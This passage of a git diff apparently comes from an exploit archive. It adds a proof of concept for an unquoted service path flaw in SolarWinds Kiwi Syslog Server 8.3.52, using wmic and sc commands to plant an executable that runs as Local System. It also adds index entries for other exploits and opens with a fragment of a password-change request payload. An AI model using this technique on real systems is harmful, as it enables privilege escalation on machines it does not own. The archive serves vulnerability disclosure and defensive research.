+oldpassword=abcd1234&newpassword=12345678&newpassword-clone=12345678
+
+
+##################################################################################################################################
--- a/exploits/windows/local/47599.txt
+++ b/exploits/windows/local/47599.txt
@ -0,0 +1,36 @@
+# Exploit Title: SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path
+# Date: 2019-11-08
+# Exploit Author: Carlos A Garcia R
+# Vendor Homepage: https://www.kiwisyslog.com/
+# Software Link: https://www.kiwisyslog.com/downloads
+# Version: 8.3.52
+# Tested on: Windows XP Professional Service Pack 3
+
+# Description:
+# SolarWinds Kiwi Syslog Server 8.3.52 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs
+
+# PoC:
+
+# C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Kiwi Syslog Server	Kiwi Syslog Server	C:\Archivos de programa\Syslogd\Syslogd_Service.exe	Auto
+
+# C:\>sc qc "Kiwi Syslog Server"
+[SC] GetServiceConfig SUCCESS
+
+SERVICE_NAME: Kiwi Syslog Server
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Archivos de programa\Syslogd\Syslogd_Service.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Kiwi Syslog Server
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+ 
+# Exploit
+Using the BINARY_PATH_NAME listed above, an executable named "Archivos.exe" 
+could be placed in "C:\", and it would be executed as the Local System user 
+next time the service was restarted.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10755,6 +10755,8 @@ id,file,description,date,author,type,platform,port
 47593,exploits/windows/local/47593.txt,"Wacom WTabletService 6.6.7-3 - 'WTabletServicePro' Unquoted Service Path",2019-11-06,"Marcos Antonio León",local,windows,
 47594,exploits/windows/local/47594.txt,"QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path",2019-11-06,"Ivan Marmolejo",local,windows,
 47597,exploits/windows/local/47597.txt,"Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path",2019-11-07,"Mariela L Martínez Hdez",local,windows,
+47599,exploits/windows/local/47599.txt,"SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path",2019-11-08,"Carlos A Garcia R",local,windows,
+47601,exploits/android/local/47601.rb,"Android Janus - APK Signature Bypass (Metasploit)",2019-11-08,Metasploit,local,android,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17763,6 +17765,7 @@ id,file,description,date,author,type,platform,port
 47566,exploits/hardware/remote/47566.cpp,"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning",2019-10-31,"Jacob Baines",remote,hardware,
 47573,exploits/multiple/remote/47573.rb,"Nostromo - Directory Traversal Remote Command Execution (Metasploit)",2019-11-01,Metasploit,remote,multiple,
 47576,exploits/windows/remote/47576.py,"Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow",2019-11-04,SYANiDE,remote,windows,
+47602,exploits/linux/remote/47602.rb,"rConfig - install Command Execution (Metasploit)",2019-11-08,Metasploit,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41914,3 +41917,6 @@ id,file,description,date,author,type,platform,port
 47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80
 47595,exploits/hardware/webapps/47595.txt,"Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass",2019-11-06,LiquidWorm,webapps,hardware,
 47596,exploits/hardware/webapps/47596.sh,"Smartwares HOME easy 1.0.9 - Database Backup Information Disclosure",2019-11-06,LiquidWorm,webapps,hardware,
+47598,exploits/java/webapps/47598.py,"Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting",2019-11-08,vesche,webapps,java,
+47600,exploits/php/webapps/47600.py,"Adive Framework 2.0.7 - Privilege Escalation",2019-11-08,"Pablo Santiago",webapps,php,
+47603,exploits/php/webapps/47603.txt,"Nextcloud 17 - Cross-Site Request Forgery",2019-11-08,"Ozer Goker",webapps,php,